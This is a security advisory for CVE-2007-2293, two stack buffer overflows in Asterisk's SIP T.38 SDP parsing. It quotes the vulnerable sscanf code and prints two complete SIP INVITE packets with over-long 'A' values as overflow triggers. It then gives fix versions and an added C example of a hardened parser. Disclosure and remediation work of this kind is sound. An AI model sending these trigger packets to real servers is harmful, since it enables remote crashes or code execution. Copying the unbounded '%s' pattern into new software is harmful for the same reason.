Topic : Two stack buffer overflows in SIP channel's T.38 SDP parsing code
SecurityAlert : 2645
CVE : CVE-2007-2293
SecurityRisk : High
Remote Exploit : Yes
Local Exploit : No
Exploit Available : No
Credit : Kevin P. Fleming (kpfleming digium com)
Published : 28.04.2007
Affected Software : Asterisk
Advisory Content :
> Asterisk Project Security Advisory - ASA-2007-010
>
> +------------------------------------------------------------------------+
> | Product            | Asterisk                                          |
> |--------------------+---------------------------------------------------|
> | Summary            | Two stack buffer overflows in SIP channel's T.38  |
> |                    | SDP parsing code                                  |
> |--------------------+---------------------------------------------------|
> | Nature of Advisory | Exploitable Stack Buffer Overflow                 |
> |--------------------+---------------------------------------------------|
> | Susceptibility     | Remote Unauthenticated Sessions                   |
> |--------------------+---------------------------------------------------|
> | Severity           | Moderate                                          |
> |--------------------+---------------------------------------------------|
> | Exploits Known     | No                                                |
> |--------------------+---------------------------------------------------|
> | Reported On        | March 22, 2007                                    |
> |--------------------+---------------------------------------------------|
> | Reported By        | Barrie Dempster, NGS Software,                    |
> |                    | <barrie (at) ngssoftware (dot) com>               |
> |--------------------+---------------------------------------------------|
> | Posted On          | April 24, 2007                                    |
> |--------------------+---------------------------------------------------|
> | Last Updated On    | April 24, 2007                                    |
> |--------------------+---------------------------------------------------|
> | Advisory Contact   | kpfleming (at) digium (dot) com                   |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------------------+
> |Description|Two closely related stack based buffer overflows exist in the SIP/SDP   |
> |           |handler of Asterisk; the vulnerabilities are very similar but exist as  |
> |           |two separate unsafe function calls. The T38FaxRateManagement and        |
> |           |T38FaxUdpEC SDP parameters can be exploited remotely leading to         |
> |           |arbitrary code execution without authentication. In order for these     |
> |           |overflows to occur, t38 fax over SIP must be enabled in sip.conf.       |
> |           |Examples of SIP INVITE packets are shown below; however, these          |
> |           |vulnerabilities can be triggered with a number of different SIP messages|
> |           |affecting calls received by Asterisk, or in response to calls made by   |
> |           |Asterisk.                                                               |
> |           |                                                                        |
> |           |Remote Unauthenticated stack overflow in Asterisk SIP/SDP               |
> |           |T38FaxRateManagement parameter                                          |
> |           |                                                                        |
> |           |A remote unauthenticated stack overflow exists in the SIP/SDP handler of|
> |           |Asterisk. By sending a SIP packet with SDP data which includes an overly|
> |           |long T38 parameter it is possible to overflow a stack based buffer and  |
> |           |execute arbitrary code.                                                 |
> |           |                                                                        |
> |           |The process_sdp function of chan_sip.c in Asterisk contains the         |
> |           |following vulnerable call to sscanf.                                    |
> |           |                                                                        |
> |           |    else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) {          |
> |           |        found = 1;                                                      |
> |           |        if (option_debug > 2)                                           |
> |           |            ast_log(LOG_DEBUG, "RateMangement: %s\n", s);               |
> |           |        if (!strcasecmp(s, "localTCF"))                                 |
> |           |            peert38capability |=                                        |
> |           |                T38FAX_RATE_MANAGEMENT_LOCAL_TCF;                       |
> |           |        else if (!strcasecmp(s, "transferredTCF"))                      |
> |           |            peert38capability |=                                        |
> |           |                T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF;                  |
> |           |                                                                        |
> |           |This attempts to read the "T38FaxRateManagement:" option from the SDP   |
> |           |within a SIP packet and copy the succeeding string into "s". There are  |
> |           |no checks on the length of this string and we can therefore write past  |
> |           |the boundaries of the "s" variable overwriting adjacent memory on the   |
> |           |stack. "s" is defined earlier in this function as being a character     |
> |           |array of only 256 bytes. The following example packet demonstrates an   |
> |           |overflow of this parameter:                                             |
> |           |                                                                        |
> |           |INVITE sip:200@127.0.0.1 SIP/2.0                                        |
> |           |Date: Wed, 21 Mar 2007 4:20:09 GMT                                      |
> |           |CSeq: 1 INVITE                                                          |
> |           |Via: SIP/2.0/UDP                                                        |
> |           |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
> |           |User-Agent: NGS/2.0                                                     |
> |           |From: "Barrie Dempster"                                                 |
> |           |<sip:zeedo@10.0.0.123:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672    |
> |           |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades                  |
> |           |To: <sip:200@localhost>                                                 |
> |           |Contact: <sip:zeedo@10.0.0.123:5068;transport=udp>                      |
> |           |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE               |
> |           |Content-Type: application/sdp                                           |
> |           |Content-Length: 796                                                     |
> |           |Max-Forwards: 70                                                        |
> |           |                                                                        |
> |           |v=0                                                                     |
> |           |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1           |
> |           |s=-                                                                     |
> |           |c=IN IP4 127.0.0.1                                                      |
> |           |t=0 0                                                                   |
> |           |m=image 5004 UDPTL t38                                                  |
> |           |a=T38FaxVersion:0                                                       |
> |           |a=T38MaxBitRate:14400                                                   |
> |           |a=T38FaxMaxBuffer:1024                                                  |
> |           |a=T38FaxMaxDatagram:238                                                 |
> |           |a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA     |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |AAAAAAAAAAAAAAAA                                                        |
> |           |a=T38FaxUdpEC:t38UDPRedundancy                                          |
> |           |                                                                        |
> |           |-------------------------------------------------                       |
> |           |                                                                        |
> |           |Remote Unauthenticated stack overflow in Asterisk SIP/SDP T38FaxUdpEC   |
> |           |parameter                                                               |
> |           |                                                                        |
> |           |A remote unauthenticated stack overflow exists in the SIP/SDP handler of|
> |           |Asterisk. By sending a SIP packet with SDP data which includes an overly|
> |           |long T38FaxUdpEC parameter it is possible to overflow a stack based     |
> |           |buffer and execute arbitrary code.                                      |
> |           |                                                                        |
> |           |The process_sdp function of chan_sip.c in Asterisk contains the         |
> |           |following vulnerable call to sscanf.                                    |
> |           |                                                                        |
> |           |    else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) {                   |
> |           |        found = 1;                                                      |
> |           |        if (option_debug > 2)                                           |
> |           |            ast_log(LOG_DEBUG, "UDP EC: %s\n", s);                      |
> |           |        if (!strcasecmp(s, "t38UDPRedundancy")) {                       |
> |           |            peert38capability |=                                        |
> |           |                T38FAX_UDP_EC_REDUNDANCY;                               |
> |           |            ast_udptl_set_error_correction_scheme(p->udptl,             |
> |           |                UDPTL_ERROR_CORRECTION_REDUNDANCY);                     |
> |           |                                                                        |
> |           |This attempts to read the "T38FaxUdpEC:" option from the SDP within a   |
> |           |SIP packet and copy the succeeding string into "s". There are no checks |
> |           |on the length of this string and we can therefore write past the        |
> |           |boundaries of the "s" variable overwriting adjacent memory on the stack.|
> |           |"s" is defined earlier in this function as being a character array of   |
> |           |only 256 bytes. The following example packet demonstrates an overflow of|
> |           |this parameter:                                                         |
> |           |                                                                        |
> |           |INVITE sip:200@127.0.0.1 SIP/2.0                                        |
> |           |Date: Wed, 21 Mar 2007 4:20:09 GMT                                      |
> |           |CSeq: 1 INVITE                                                          |
> |           |Via: SIP/2.0/UDP                                                        |
> |           |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
> |           |User-Agent: NGS/2.0                                                     |
> |           |From: "Barrie Dempster"                                                 |
> |           |<sip:zeedo@10.0.0.123:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672    |
> |           |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades                  |
> |           |To: <sip:200@localhost>                                                 |
> |           |Contact: <sip:zeedo@10.0.0.123:5068;transport=udp>                      |
> |           |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE               |
> |           |Content-Type: application/sdp                                           |
> |           |Content-Length: 796                                                     |
> |           |Max-Forwards: 70                                                        |
> |           |                                                                        |
> |           |v=0                                                                     |
> |           |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1           |
> |           |s=-                                                                     |
> |           |c=IN IP4 127.0.0.1                                                      |
> |           |t=0 0                                                                   |
> |           |m=image 5004 UDPTL t38                                                  |
> |           |a=T38FaxVersion:0                                                       |
> |           |a=T38MaxBitRate:14400                                                   |
> |           |a=T38FaxMaxBuffer:1024                                                  |
> |           |a=T38FaxMaxDatagram:238                                                 |
> |           |a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA     |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |AAAAAAAAA                                                               |
> +------------------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Resolution | T.38 support in the affected versions of Asterisk is not  |
> |            | enabled by default, therefore the severity of this issue  |
> |            | is 'moderate'.                                            |
> |            |                                                           |
> |            | Users who are using the default configuration with        |
> |            | 't38_udptl' set to 'no' or an equivalent value are not    |
> |            | susceptible to this vulnerability. Users who have set     |
> |            | this configuration item to 'yes' or an equivalent value   |
> |            | but are not actually using T.38 support can set it to     |
> |            | 'no' to secure their systems against this vulnerability.  |
> |            |                                                           |
> |            | All other users are urged to upgrade to the appropriate   |
> |            | version of their Asterisk product listed in the           |
> |            | 'Corrected In' section below.                             |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Affected Versions                                                      |
> |------------------------------------------------------------------------|
> | Product                      | Release     |                           |
> |                              | Series      |                           |
> |------------------------------+-------------+---------------------------|
> | Asterisk Open Source         | 1.0.x       | not affected; does not    |
> |                              |             | contain T.38 support      |
> |------------------------------+-------------+---------------------------|
> | Asterisk Open Source         | 1.2.x       | not affected; does not    |
> |                              |             | contain T.38 support      |
> |------------------------------+-------------+---------------------------|
> | Asterisk Open Source         | 1.4.x       | all releases prior to     |
> |                              |             | 1.4.3                     |
> |------------------------------+-------------+---------------------------|
> | Asterisk Business Edition    | A.x.x       | not affected; does not    |
> |                              |             | contain T.38 support      |
> |------------------------------+-------------+---------------------------|
> | Asterisk Business Edition    | B.x.x       | not affected; does not    |
> |                              |             | contain T.38 support      |
> |------------------------------+-------------+---------------------------|
> | AsteriskNOW                  | pre-release | all releases prior to and |
> |                              |             | including Beta 5          |
> |------------------------------+-------------+---------------------------|
> | Asterisk Appliance Developer | 0.x.x       | all releases prior to     |
> | Kit                          |             | 0.4.0                     |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Corrected In                                                           |
> |------------------------------------------------------------------------|
> | Product            | Release                                           |
> |--------------------+---------------------------------------------------|
> | Asterisk Open      | 1.4.3, available from                             |
> | Source             | ftp://ftp.digium.com/pub/telephony/asterisk       |
> |--------------------+---------------------------------------------------|
> | AsteriskNOW        | Beta 6, when available from                       |
> |                    | http://www.asterisknow.org, Beta 5 users can use  |
> |                    | 'System Update' in the appliance control panel to |
> |                    | update their version of AsteriskNOW               |
> |--------------------+---------------------------------------------------|
> | Asterisk Appliance | 0.4.0, available from                             |
> | Developer Kit      | ftp://ftp.digium.com/pub/telephony/aadk           |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Links                                                                  |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Asterisk Project Security Advisories are posted at                     |
> | http://www.asterisk.org/security.                                      |
> |                                                                        |
> | This document may be superseded by later versions; if so, the latest   |
> | version will be posted at                                              |
> | http://www.asterisk.org/files/ASA-2007-010.pdf.                        |
> +------------------------------------------------------------------------+
>
> Asterisk Project Security Advisory - ASA-2007-010
> Copyright (c) 2007 Digium, Inc. All Rights Reserved.
> Permission is hereby granted to distribute and publish this advisory in its
> original, unaltered form.
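The two sscanf calls quoted in the advisory share one defect: the "%s" conversion carries no field width, so the value following "T38FaxRateManagement:" or "T38FaxUdpEC:" is copied into the 256-byte "s" array up to the next whitespace, however long it is, and the trailing 'A's of the sample INVITE land on the stack beyond "s". The C program below is an added example and is not code from the advisory or from the Asterisk source tree. It models that copy without performing it, so it can be run safely against an over-long value, and places next to it a width-limited conversion ("%255s", one less than the buffer size) with an explicit length check that rejects a value which filled the buffer instead of silently truncating it. The function names, the capability bit values, the T38_VALUE_MAX size and the constructed sample values are this example's own assumptions; the width-limited form is a standard hardening of this sscanf pattern, not a claim about the exact change shipped in Asterisk 1.4.3.

```c
/* Added example, not code from the Asterisk advisory or the Asterisk source:
 * a small model of the T.38 attribute handling the advisory describes, with the
 * unsafe sscanf("%s") pattern next to a width-limited, length-checked version.
 * Function names, the capability bit values, T38_VALUE_MAX and the constructed
 * sample input are this example's own assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define T38_VALUE_MAX 256  /* the 256-byte "s" buffer the advisory describes */

/* Capability flags named in the advisory's snippet; the bit values are assumed. */
enum {
    T38FAX_RATE_MANAGEMENT_LOCAL_TCF      = 1 << 0,
    T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF = 1 << 1,
    T38FAX_UDP_EC_REDUNDANCY              = 1 << 2,
};

/* Case-insensitive equality, standing in for strcasecmp() == 0. */
static int ieq(const char *a, const char *b)
{
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
    return *a == *b;
}

/* Models sscanf(a, "<name>%s", s) WITHOUT performing the copy: "%s" skips
 * leading whitespace, then stores bytes up to the next whitespace plus a NUL,
 * ignoring sizeof(s). Returns 1 if that store would exceed T38_VALUE_MAX
 * bytes (the advisory's overflow condition), else 0. */
int unsafe_sscanf_would_overflow(const char *a, const char *name)
{
    size_t nlen = strlen(name);
    if (strncmp(a, name, nlen) != 0)
        return 0;                       /* no match: sscanf would return 0 */
    const char *v = a + nlen;
    while (*v == ' ' || *v == '\t' || *v == '\r' || *v == '\n')
        v++;
    return strcspn(v, " \t\r\n") + 1 > T38_VALUE_MAX;
}

/* Hardened handler for the body of one "a=" line (the part after "a=").
 * The conversion width 255 (T38_VALUE_MAX - 1) means sscanf can never write
 * past s; the length check then rejects a value that filled the buffer instead
 * of silently truncating it. Returns 1 when a known attribute was applied to
 * *cap, 0 when the line is neither attribute, -1 when the value was rejected. */
int parse_t38_attr(const char *a, int *cap)
{
    char s[T38_VALUE_MAX];
    if (sscanf(a, "T38FaxRateManagement:%255s", s) == 1) {
        if (strlen(s) >= T38_VALUE_MAX - 1)
            return -1;
        if (ieq(s, "localTCF"))
            *cap |= T38FAX_RATE_MANAGEMENT_LOCAL_TCF;
        else if (ieq(s, "transferredTCF"))
            *cap |= T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF;
        return 1;
    }
    if (sscanf(a, "T38FaxUdpEC:%255s", s) == 1) {
        if (strlen(s) >= T38_VALUE_MAX - 1)
            return -1;
        if (ieq(s, "t38UDPRedundancy"))
            *cap |= T38FAX_UDP_EC_REDUNDANCY;
        return 1;
    }
    return 0;
}

/* Constructs "<name>" + alen 'A's (a stand-in for the advisory's payload of
 * several hundred 'A's) and runs it through both paths. Returns 1 if the
 * unsafe "%s" copy would overflow; *hardened gets parse_t38_attr's result. */
int probe_long_value(const char *name, size_t alen, int *hardened)
{
    char buf[2048];
    int cap = 0;
    size_t nlen = strlen(name);
    if (nlen + alen + 1 > sizeof buf)
        alen = sizeof buf - nlen - 1;
    memcpy(buf, name, nlen);
    memset(buf + nlen, 'A', alen);
    buf[nlen + alen] = '\0';
    if (hardened)
        *hardened = parse_t38_attr(buf, &cap);
    return unsafe_sscanf_would_overflow(buf, name);
}

int main(void)
{
    int cap = 0, hard = 0;
    int over = probe_long_value("T38FaxRateManagement:", 500, &hard);
    printf("500-byte value: unsafe %%s overflows=%d, hardened result=%d\n", over, hard);
    parse_t38_attr("T38FaxRateManagement:transferredTCF", &cap);
    parse_t38_attr("T38FaxUdpEC:t38UDPRedundancy", &cap);
    printf("benign offer: capabilities=%#x\n", cap);
    return 0;
}
```

Build with cc -Wall and run: the 500-byte value is reported as overflowing on the unsafe path and is rejected (-1) by the hardened parser, while the benign attribute values from the advisory's INVITE set the expected capability bits. The hardened parser also rejects a 255-byte value that would not itself have overflowed; that is deliberate, since a legitimate T.38 value is a short token and anything that fills the buffer is better treated as malformed and the offer dropped than truncated and matched.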